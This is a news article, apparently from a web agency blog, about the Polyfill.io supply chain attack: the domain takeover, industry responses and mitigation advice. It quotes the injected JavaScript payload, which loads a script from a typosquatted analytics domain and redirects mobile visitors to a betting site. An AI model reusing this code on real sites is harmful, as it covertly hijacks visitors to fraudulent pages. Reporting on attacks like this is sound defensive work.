Polyfill supply chain attack affects 100K+ sites

AI Bot
By AI Bot ·

Loading the Text to Speech Audio Player...

In a significant cybersecurity incident, the Polyfill supply chain attack has compromised over 100,000 websites. This breach affects notable users, including JSTOR, Intuit, and the World Economic Forum, highlighting the pervasive reach and potential dangers of the attack.

The Incident

Polyfill.js is a widely-used open-source library designed to support older browsers by embedding the cdn.polyfill.io domain. However, a Chinese company acquired both the domain and the corresponding GitHub account in February 2023. Since then, malicious actors have exploited this access to inject malware into mobile devices through any site that uses cdn.polyfill.io.

The ongoing attack has prompted a series of responses from major tech players and cybersecurity firms:

  • Google: As of June 25th, Google has started blocking Google Ads for eCommerce sites that use cdn.polyfill.io.
  • Cloudflare: On June 27th, Cloudflare implemented real-time rewrites of cdn.polyfill.io to more secure versions.
  • Namecheap: Shortly after Cloudflare's intervention, Namecheap put the domain on hold, reducing the immediate risk.

Despite these measures, the original authors of Polyfill recommend that users should avoid using Polyfill altogether, as modern browsers no longer require it. For those who still need it, alternatives provided by Fastly and Cloudflare have emerged.

Technical Aspects of the Attack

The malicious code embedded via Polyfill is dynamically generated based on HTTP headers, increasing the complexity and reach of the attack vectors. According to analysis from SanSec:

  • The malware targets specific mobile devices and activates only under certain conditions, such as specific hours and the absence of administrative users.
  • It redirects users to a fraudulent sports betting site through a fake Google Analytics domain (www.googie-anaiytics.com).
  • The code is engineered to avoid detection by delaying its execution when it encounters web analytics services.

Example of Malicious Payload

function isPc() {
  try {
    var isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
        isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" || 
        navigator.platform == "Macintosh" || navigator.platform == "MacIntel";
    
    if (isMac || isWin) {
      return true;
    } else {
      return false;
    }
  } catch (exception) {
    return false;
  }
}
 
function vfed_update(url) {
  url !== "" && loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
    if (usercache == true) {
      window.location.href = url;
    }
  });
}
 
function check_tiaozhuan() {
  var isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|
  Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|
  WebOS|Symbian|Windows Phone)/i);
  
  if (isMobile) {
    var curHost = window.location.host,
        ref = document.referrer,
        redirectURL = "",
        kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
        rnd = Math.floor(Math.random() * 100 + 1),
        date = new Date(),
        hours = date.getHours();
    
    if (curHost.indexOf("www.dxtv1.com") !== -1 || curHost.indexOf("www.ys752.com") !== -1) {
      redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (curHost.indexOf("shuanshu.com.com") !== -1) {
      redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (ref.indexOf(".") !== -1 && ref.indexOf(curHost) == -1) {
      redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else if (hours >= 0 && hours < 2 && rnd <= 10) {
      redirectURL = kuurzaBitGet;
    } else if (hours >= 2 && hours < 4 && rnd <= 15) {
      redirectURL = kuurzaBitGet;
    } else if (hours >= 4 && hours < 7 && rnd <= 20) {
      redirectURL = kuurzaBitGet;
    } else if (hours >= 7 && hours < 8 && rnd <= 10) {
      redirectURL = kuurzaBitGet;
    } else if (rnd <= 10) {
      redirectURL = kuurzaBitGet;
    }
    
    if (redirectURL !== "" && !isPc() && !document.cookie.includes("admin_id") && !document.cookie.includes("adminlevels")) {
      vfed_update(redirectURL);
    }
  }
  setTimeout(check_tiaozhuan, 2000);
}
check_tiaozhuan();

Recommendations

As the risks associated with using cdn.polyfill.io remain high, experts recommend removing any Polyfill references in your code. Users can utilize alternative services provided by Fastly and Cloudflare, which are confirmed to be trustworthy for this purpose. Additionally, employing a Content Security Policy (CSP) monitoring service, such as the free CSP monitoring service Sansec Watch, can help gain visibility into the code users are loading.

Furthermore, updating backend scanners, like Sansec's eComscan, to detect Polyfill-related vulnerabilities can provide an added layer of security.

Official Statements

The original Polyfill author has advised against using the service, stating, "it is no longer needed by modern browsers."

SanSec has been at the forefront, providing updates and technical insights, reinforcing the urgency to replace or remove Polyfill from affected websites.

For more information, visit the detailed analysis by SanSec here.


Want to read more news? Check out our latest news article on Next.js 15 RC Launched: A Preview of the Future in Web Development.

Discuss Your Project with Us

We're here to help with your web development needs. Schedule a call to discuss your project and how we can assist you.

Let's find the best solutions for your needs.